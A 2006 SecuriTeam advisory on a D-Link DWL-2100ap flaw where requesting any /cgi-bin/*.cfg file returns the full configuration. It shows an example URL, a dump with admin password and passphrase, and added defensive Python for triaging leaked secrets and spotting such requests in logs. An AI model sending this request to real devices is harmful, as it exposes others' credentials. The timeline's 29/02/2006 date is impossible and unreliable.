[NEWS] D-Link DWL-2100ap Information Disclosure



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



D-Link DWL-2100ap Information Disclosure
------------------------------------------------------------------------


SUMMARY

The D-Link AirPlus Xtreme G(TM) series of high-speed devices is now capable
of delivering transfer rates up to 15x faster than standard 802.11b with
the new D-Link 108G.

Improper authentication validation allows attackers to retrieve
information from a D-Link Wireless Access-Point DWL-2100ap.

DETAILS

Normally, an HTTP request to the /cgi-bin/ directory makes the Web
server return error 404 (Page not found).
An HTTP request to the /cgi-bin/AnyFile.htm file also makes the Web server
return error 404 (Page not found).
However, an HTTP request to any file in the /cgi-bin/ directory with
the extension .cfg returns the entire device configuration.

Example:
http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg

Will return:

# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
# Several lines removed.
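
For incident response, the dump above tells you which credentials were exposed and must be rotated. The following is an added example, not code from the advisory or from D-Link; the set of sensitive key names and the "wlanN" prefix rule are assumptions taken from the lines shown above.

```python
import re

# Added example: list which secrets a leaked Ar52xxAP config dump exposes.
# SENSITIVE_KEYS and the wlanN prefix rule are assumptions based on the excerpt.
SENSITIVE_KEYS = {"password", "passphrase", "RADIUSsecret"}
IFACE = re.compile(r"wlan\d+")

# Sample input: lines copied from the advisory's excerpt.
SAMPLE_DUMP = """\
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
IP_Addr 10.0.0.30
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
# Several lines removed.
"""

def parse_dump(text):
    """Yield (key, value); value is '' when the setting is present but unset."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        head, _, rest = line.partition(" ")
        if IFACE.fullmatch(head):  # per-interface key, e.g. "wlan1 passphrase"
            sub, _, rest = rest.strip().partition(" ")
            head = f"{head} {sub}".strip()
        yield head.rstrip(":"), rest.strip()

def triage(text):
    """Return the login name and the non-empty secrets that need rotation."""
    entries = dict(parse_dump(text))
    if entries.get("magic") != "Ar52xxAP":
        raise ValueError("not an Ar52xxAP configuration dump")
    rotate = [k for k, v in entries.items()
              if k.split()[-1] in SENSITIVE_KEYS and v]
    return {"login": entries.get("login", ""), "rotate": rotate}

if __name__ == "__main__":
    print(triage(SAMPLE_DUMP))
```

Keys that are present but empty (RADIUSsecret and the bare passphrase line in the excerpt) are not reported, because no value was disclosed for them.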

The D-Link DWL-2100ap Access Point does not allow users to disable the Web
server, nor does it offer an option to filter open ports.
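
Because the Web server cannot be switched off on the device, requests of the kind described above have to be spotted upstream. The following is an added example, not part of the original advisory: it scans an HTTP access log for /cgi-bin/*.cfg requests. The log source (a proxy or sensor in front of the access point), the Common Log Format, and the reading of status 200 as "configuration returned" are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Added example: flag requests for /cgi-bin/*.cfg in an HTTP access log.
# Assumes Common Log Format from a proxy or sensor in front of the AP.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)

# Constructed sample log lines (addresses, times and sizes are made up).
SAMPLE_LOG = """\
10.0.0.57 - - [12/Mar/2006:09:14:02 -0300] "GET /cgi-bin/Intruders.cfg HTTP/1.1" 200 2143
10.0.0.57 - - [12/Mar/2006:09:14:05 -0300] "GET /cgi-bin/AnyFile.htm HTTP/1.1" 404 0
10.0.0.88 - - [12/Mar/2006:10:02:41 -0300] "GET /cgi-bin/x%2Ecfg?a=1 HTTP/1.0" 404 0
10.0.0.12 - - [12/Mar/2006:10:05:00 -0300] "GET /index.htm HTTP/1.1" 200 512
"""

def classify(line):
    """Return (source, decoded path, verdict) for a .cfg request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Drop the query string and decode %-escapes before matching the path.
    path = unquote(urlsplit(m["target"]).path)
    lowered = path.lower()  # match case-insensitively to avoid missing variants
    if not (lowered.startswith("/cgi-bin/") and lowered.endswith(".cfg")):
        return None
    # Assumption: 200 means the configuration was served; anything else
    # (for example 404 after the firmware upgrade) is only an attempt.
    verdict = "config-returned" if m["status"] == "200" else "attempt"
    return (m["src"], path, verdict)

def scan(log_text):
    """Classify every line and keep only the .cfg requests."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```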

Vendor Status:
Upgrade the firmware of D-Link DWL-2100ap Access Point:
http://www.dlinkbrasil.com.br/internet/downloads/Wireless/DWL-2100AP/DWL2100AP-firmware-v210na-r0343.tfp

Disclosure Timeline:
11/02/2006 - Vulnerability discovered during a Pen-Test.
15/02/2006 - D-Link World Wide Team Contacted.
17/02/2006 - No response.
18/02/2006 - D-Link World Wide Team re-contacted.
24/02/2006 - No response.
25/02/2006 - D-Link World Wide Team last try of contact.
29/02/2006 - No response.
29/02/2006 - D-Link Brazil Team Contacted.
02/03/2006 - No response.
03/03/2006 - D-Link Brazil Team re-contacted.
06/03/2006 - D-Link Brazil Team responded.
09/03/2006 - Patch created.
14/03/2006 - Patch added to D-Link Brazil download site.
06/06/2006 - Advisory published.


ADDITIONAL INFORMATION

The information has been provided by INTRUDERS TIGER TEAM
(news@xxxxxxxxxxxxxxxxxxxxxxxxx).
The original article can be found at:
http://www.intruders.org.br/adv0206en.html


